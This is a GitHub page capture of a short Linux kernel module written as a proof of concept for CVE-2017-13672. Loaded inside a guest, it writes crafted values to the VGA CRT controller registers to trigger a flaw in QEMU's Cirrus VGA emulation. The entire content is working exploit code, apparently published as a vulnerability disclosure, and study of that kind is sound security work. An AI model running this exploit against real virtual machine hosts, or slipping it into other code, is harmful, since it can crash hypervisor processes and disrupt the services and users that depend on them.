Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
#define LINUX
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <asm/io.h>
#define DRIVER_AUTHOR "David Buchanan"
#define DRIVER_DESC "CVE-2017-13672 POC"
/* From qemu/hw/display/vga_regs.h */
#define VGA_CRT_IC 0x3D4 /* CRT Controller Index - color emulation */
#define VGA_CRT_DC 0x3D5 /* CRT Controller Data Register - color emulation */
/* From CL-GD5446 Technical Reference Manual */
#define VGA_CRC 0x0C /* CRTC Screen Start Address High Register */
#define VGA_CRD 0x0D /* CRTC Screen Start Address Low Register */
#define VGA_CR1B 0x1B /* Extended Display Controls Register */
#define VGA_CR1D 0x1D /* Overlay Extended Control Register */
unsigned char crc_bak, crd_bak, cr1b_bak, cr1d_bak;
unsigned char vga_crt_read(unsigned char reg) {
outb_p(reg, VGA_CRT_IC);
return inb_p(VGA_CRT_DC);
}
void vga_crt_write(unsigned char val, unsigned char reg) {
outb_p(reg, VGA_CRT_IC);
outb_p(val, VGA_CRT_DC);
}
int init_module(void)
{
printk(KERN_ALERT "Attempting to exploit CVE-2017-13672...\n");
crc_bak = vga_crt_read(VGA_CRC);
crd_bak = vga_crt_read(VGA_CRD);
cr1b_bak = vga_crt_read(VGA_CR1B);
cr1d_bak = vga_crt_read(VGA_CR1D);
vga_crt_write(0xFF, VGA_CRC);
vga_crt_write(0xFF, VGA_CRD);
vga_crt_write(cr1b_bak | 0x0D, VGA_CR1B);
vga_crt_write(cr1d_bak | 0x80, VGA_CR1D); // usually only this bit needs to be set
return 0;
}
void cleanup_module(void)
{
printk("If you got this far, exploitation was unsuccessful. Attempting to unload CVE-2017-13672. This may or may not fix your graphics.\n");
vga_crt_write(crc_bak, VGA_CRC);
vga_crt_write(crd_bak, VGA_CRD);
vga_crt_write(cr1b_bak, VGA_CR1B);
vga_crt_write(cr1d_bak, VGA_CR1D);
}
MODULE_LICENSE("Dual MIT/GPL");
MODULE_AUTHOR(DRIVER_AUTHOR);
MODULE_DESCRIPTION(DRIVER_DESC);